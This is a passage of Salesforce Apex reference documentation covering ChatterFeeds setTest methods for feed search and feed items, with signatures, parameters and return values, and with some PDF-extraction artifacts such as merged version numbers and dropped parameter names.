feedType
Type: ConnectApi.FeedType
Type: String
If feedType is ConnectApi.Record, subjectId can be any record ID, including a group ID. Otherwise, it must be the
context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
768
Reference
ChatterFeeds Class
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
30.031.0
Signature
public static Void setTestGetFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
Boolean, showInternalOnly, ConnectApi.FeedItemPage result)
769
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
If feedType is ConnectApi.Record, subjectId can be any record ID, including a group ID. Otherwise, it must be the
context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
770
Reference
ChatterFeeds Class
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String, Boolean)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElements(String communityId, String q,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
771
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedElements(String, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElements(String communityId, String q,
ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
If you pass in null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
772
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedElements(String, String, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElements(String communityId, String q, String
pageParam, Integer pageSize, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.D
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
773
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedElements(String, String, String, Integer)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElements(String communityId, String q, String
pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
774
Reference
ChatterFeeds Class
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElements(String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElements(String communityId, String q, Integer
recentCommentCount, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
775
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
If you pass in null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElements(String, String, Integer, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String q, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
776
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
777
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
ConnectApi.FeedElementPage result)
778
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
779
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
String)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
ConnectApi.FeedFilter filter, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
780
Reference
ChatterFeeds Class
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
String, ConnectApi.FeedFilter)
Testing ConnectApi Code
781
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String q, ConnectApi.FeedElementPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feed type is UserProfile, subjectId
can be any user ID. If feedType is any other value, subjectId must be the ID of the context user or the alias me.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, String)
Testing ConnectApi Code
782
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Specifies the order returned by the sort, such as by date created or last modified:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
783
Reference
ChatterFeeds Class
Type: String
Search term. Searches keywords in the user or group name. A minimum of 1 character is required. This parameter does not support
wildcards. This parameter is required.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
784
Reference
ChatterFeeds Class
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
785
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, Boolean showInternalOnly,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
786
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean)
Testing ConnectApi Code
API Version
32.0
787
Reference
ChatterFeeds Class
Signature
public static Void setTestSearchFeedElementsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, Boolean showInternalOnly,
ConnectApi.FeedFilter filter, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
788
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean, ConnectApi.FeedFilter)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFilterFeed(String communityId, String
subjectId, String keyPrefix, String q, ConnectApi.FeedElementPage result)
789
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFilterFeed(String, String, String, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFilterFeed(String communityId, String
subjectId, String keyPrefix, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, String q, ConnectApi.FeedElementPage result)
790
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
791
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestSearchFeedElementsInFilterFeed(String communityId, String
subjectId, String keyPrefix, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
792
Reference
ChatterFeeds Class
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedElementsInFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void searchFeedItems(String communityId, String q, ConnectApi.FeedItemPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
793
Reference
ChatterFeeds Class
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedItems(String, String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItems(String communityId, String q,
ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
794
Reference
ChatterFeeds Class
result
Type: ConnectApi.FeedItemPage
The feed item test page.
Return Value
Type: Void
SEE ALSO:
searchFeedItems(String, String, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItems(String communityId, String q, String pageParam,
Integer pageSize, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.FeedItemPage
The test feed item page.
795
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedItems(String, String, String, Integer)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItems(String communityId, String q, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
796
Reference
ChatterFeeds Class
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The test feed item page.
Return Value
Type: Void
SEE ALSO:
searchFeedItems(String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestSearchFeedItems(String communityId, String q, Integer
recentCommentCount, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
797
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The test feed item page.
Return Value
Type: Void
SEE ALSO:
searchFeedItems(String, String, Integer, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
798
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String
q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
799
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, Integer recentCommentCount, ConnectApi.FeedDensity density, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedItemPage
result)
800
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
801
Reference
ChatterFeeds Class
Return Value
Type: Void
